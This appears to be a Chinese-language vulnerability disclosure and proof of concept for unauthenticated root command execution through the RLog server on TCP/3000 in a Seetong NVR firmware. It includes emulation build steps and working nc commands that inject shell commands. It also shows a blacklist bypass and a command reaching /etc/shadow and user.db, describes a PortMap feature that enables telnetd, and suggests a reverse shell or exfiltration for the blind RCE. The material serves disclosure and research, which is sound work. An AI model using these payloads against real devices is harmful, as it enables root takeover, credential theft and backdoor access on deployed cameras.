该测试框架演示了固件的 libLOG.so 会在 TCP/3000 上启动一个 RLog
服务器。命令调度器分析和动态测试
证明了可通过该服务器实现未经身份验证的操作系统命令执行。
它在 qemu-arm 下加载固件自身的 libLOG.so,调用 TLog_Init()
随后真实服务器绑定到 0.0.0.0:3000,并接受来自任意位置的入站连接,
且无需任何身份验证。
该固件在 TCP/3000 上暴露了一个未经身份验证的 RLog 命令服务器。
命令调度器注册了 Cmd,它会将攻击者控制的
输入传递给 TLog_CMD。TLog_CMD 最终调用固件的命令
执行后端。
因此:
Unauthenticated TCP connection
↓
RLog command dispatcher
↓
Cmd <attacker-controlled command>
↓
TLog_CMD
↓
mysystem()
↓
/bin/sh
↓
command execution
harness.c:持久化版本:启动服务器并保持休眠(实际使用时请用这个)probe_harness.c:探测版本:还会从模拟器内部尝试命令探测(展示了类型字节分帧要求)如果下面脚本用于创建 sysroot 的固件下载已不存在。你可以从以下任一来源获取(只需对 nvr 进行图片搜索,该固件广泛分发):
我使用的是固件 v4.6.1.4-build202604241011,其他固件版本尚未测试,但像 fullward 这样的下游分销商也有该固件。
在与测试框架相同的目录中运行以下命令
# Download and extract toolchain
wget https://gitlab.arm.com/api/v4/projects/tooling%2Fgnu-toolchains-for-arm/packages/generic/gnu-toolchain/15.3.rel1/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz
tar -xvf arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz
TC=$(pwd)/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf
# Creating the sysroot
wget http://www.tpsee.com/upload/firmware/update-ts81xxd3x-v4.6.1.4-build202604241011.bin
binwalk -Me update-ts81xxd3x-v4.6.1.4-build202604241011.bin
mkdir -p sysroot
cp -a "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_rootfs.ts81xxd3x.extracted/squashfs-root/lib" sysroot/
cp "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libLOG.so" \
"_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libmysystem.so" sysroot/lib/
$TC -march=armv7-a -mthumb -mfloat-abi=soft -nostdlib -ffreestanding -fno-builtin \
-Wl,--dynamic-linker,/lib/ld-uClibc.so.0 -Wl,-rpath,/lib -Wl,-e,_start -Wl,--export-dynamic \
harness.c -o harness -L sysroot/lib -lc
该测试框架提供了 libLOG.so 从 edvr 导入的符号的桩实现
qemu-arm -L sysroot ./harness &
sleep 2
ss -tln | grep 3000
# -> LISTEN 0 5 0.0.0.0:3000 0.0.0.0:* (qemu user-mode forwards the emulated socket to the host)
probe_harness.c 的观察输出(不是上面脚本中使用的那个):
dlopen ok
TLog_Init() -> 0
--- probe port 3000 ---
connect port 3000 OK (x5 meaning every connection accepted)
REPLY: timeout/none (plain-text probes ignored: binary type-byte framing required)
➜ seetong-ts81xxd3x-rce printf 'Cmd cat /etc/os-release > /tmp/rlog_os.txt\r\n' | nc 127.0.0.1 3000
^C%
➜ seetong-ts81xxd3x-rce cat /tmp/rlog_os.txt
NAME="Artix Linux"
PRETTY_NAME="Artix Linux"
ID=artix
BUILD_ID=rolling
ANSI_COLOR="38;2;23;147;209"
HOME_URL="https://artixlinux.org/"
DOCUMENTATION_URL="https://wiki.artixlinux.org/"
SUPPORT_URL="https://forum.artixlinux.org/"
BUG_REPORT_URL="https://bugs.artixlinux.org/"
PRIVACY_POLICY_URL="https://terms.artixlinux.org/docs/privacy-policy/"
LOGO=artixlinux-logo
➜ seetong-ts81xxd3x-rce
显示 Artix Linux 是因为 qemu 用户模式共享主机文件系统,而此 PoC 并未正确隔离它。
AI 披露,以下文本由 AI 生成
LogModuleRegCmd @ 0x8f94)| 命令 | 处理函数 | 效果 |
|---|---|---|
StartDebug、StartLog、SetLogLevel、Help、StartAutoTest | 各种 | 日志/自检控制 |
GetSystemStatus、GetSystemInfo、GetSystemLog、GetSystemCfg | TLog_Get* | 信息/配置/日志泄露 |
GetSystemFile [abs names] | TLog_GetSystemFile (0x7a94) + TLog_SendFile (0x48f0) | 任意文件读取(/etc/shadow、/usr/local/etc/user.db 等) |
GetPrintfFile | TLog_GetPrintfFile | 文件读取 |
Cmd [System commands] | TLog_CMD (0x3680) | 以 root 身份执行 shell 命令 |
PortMap on <ip> <port> / PortMap off | fcn.00008b76 | 反向 TUN 隧道 + 端口 23 上的 telnetd |
; \r \n 停止)。vi、cd、top、if、killcmd}(strcmp)——可轻易绕过(cat、sh、引号)。"%s -b" → 通过 sh -c 运行。ps -ef | grep "sh -c %s" |grep -v grep、'{print $1}' | xargs kill -9。mysystem()(libmysystem.so)→ IPC 到 /usr/sbin/systemd(伪 systemd,以 root 身份通过 /bin/sh 执行;字符串 "[systemd cmd:]%s"、"[systemd ret:]%d")。黑名单演示(2026-08-04,模拟服务器):
Cmd vi > /tmp/bl_vi → dropped (no file created)
Cmd cat /etc/hostname > /tmp/bl_cat → executed (file contains hostname)
Cmd v''i > /tmp/bl_bypass → BLACKLIST BYPASSED (shell sees `vi`, strcmp sees `v''i`)
PortMap on <ip> <port>(期望 3 个字段)。portmap_client_start(ip, port) (0x88b0):
system("lsmod | grep -q '^tun\\b' || insmod /config/modules/4.9.84/tun.ko")/dev/net/tun,创建接口 tps0,ifconfig tps0 up/mnt/nand/yun_id.txt、/etc/product_type.txtsystem("touch /usr/local/etc/normal_telnet") (0x897e→0x8982)system("killall telnetd") (0x8c1e) 和 system("telnetd -p 23 &") (0x8c32)。portmap_client_stop (0x8a48) → system("rm -f /usr/local/etc/normal_telnet")、ifconfig tps0 down。portmap_client_get_status、portmap_client_is_running、portmap_client_get_assigned_ip。"usage: PortMap on <ip> <port> | PortMap off\n"、"PortMap on: IP=%s, Port=%d\n"、"PortMap start success! ret:%d"、"PortMap stop success!"。"rm %s/* -rf" (0xad10) — 由日志目录清理使用(TLog_DeleteLogFile)。测试框架(harness.c)dlopen libLOG.so,为其 edvr 导入提供桩,调用 TLog_Init():
dlopen ok
TLog_Init() -> 0
主机侧(qemu 用户模式套接字透传):
LISTEN 0 5 0.0.0.0:3000 0.0.0.0:* users:(("qemu-arm",pid=...,fd=0))
命令执行证明(纯文本,无认证):
$ printf 'Cmd touch /tmp/rlog_pwned\r\n' | nc <target> 3000 # file created
$ printf 'Cmd id > /tmp/rlog_id.txt\r\n' | nc <target> 3000 # id output captured
两者均在模拟服务器上验证。命令通过 mysystem() → /usr/sbin/systemd → /bin/sh 执行(在设备上为 root)。套接字上不返回任何输出(盲 RCE;请使用带外数据外泄,例如 Cmd cat /usr/local/etc/user.db > /mnt/... 或反向 shell)。
影响: 任何未经身份验证的网络攻击者都可以以 root 身份执行 shell 命令、读取任意文件(包括明文密码数据库和泄露密码的日志),并将 telnet 切换到端口 23。在局域网中这已是致命打击;在暴露于互联网的设备上同样如此。